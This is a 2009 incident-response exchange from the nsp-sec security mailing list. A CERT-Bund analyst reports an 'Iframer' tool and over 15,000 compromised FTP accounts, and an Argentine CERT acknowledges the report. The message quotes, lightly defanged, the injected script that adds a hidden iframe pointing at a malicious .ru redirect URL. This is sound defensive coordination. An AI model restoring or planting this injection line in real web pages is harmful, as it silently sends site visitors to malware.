[nsp-sec] ACK: Compromised ftp accounts
Rodolfo Baader
rbaader at arcert.gov.ar
Wed Aug 26 14:59:56 EDT 2009
Hi!
ACK for AR <CC> (ASNs and/or IPs).
R.
Thomas Hungenberg wrote:
> ----------- nsp-security Confidential --------
>
>
>
> ------------------------------------------------------------------------
>
>
> The gzip'ed attachment did not make it to the list, so I'm sending the list
> again uncompressed.
>
>
> - Thomas
>
> CERT-Bund Incident Response & Anti-Malware Team
>
>
> Thomas Hungenberg schrieb:
>> Hi teams,
>>
>> I've come across an Iframer installation along with a list of 15.000+ ftp credentials.
>>
>> The Iframer tool most probably recently tried to inject this line (remove 'XXX'):
>> <scrXXXipt>document.write(\'<ifrXXXame src=\"htXXXtp://sexyy.ru/tds/go.php?sid=1\" width=\"0\" height=\"0\" style=\"display:none;visibility:hidden;\"></ifrXXXame>\');</scrXXXipt>
>>
>> Please find attached a sanitized list (pw removed) of the compromised ftp accounts.
>> Format: ASN | IP | CC | ftp username | AS name
>>
>> Top 10 country codes:
>>
>> 5240 US
>> 1263 RU
>> 1187 DE
>> 882 EU
>> 803 TR
>> 720 CZ
>> 674 FR
>> 655 PL
>> 564 HU
>> 475 NL
>>
>>
>> - Thomas
>>
>> CERT-Bund Incident Response & Anti-Malware Team
>>
>
>
> ------------------------------------------------------------------------
>
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security counter-measures.
> _______________________________________________
More information about the nsp-security
mailing list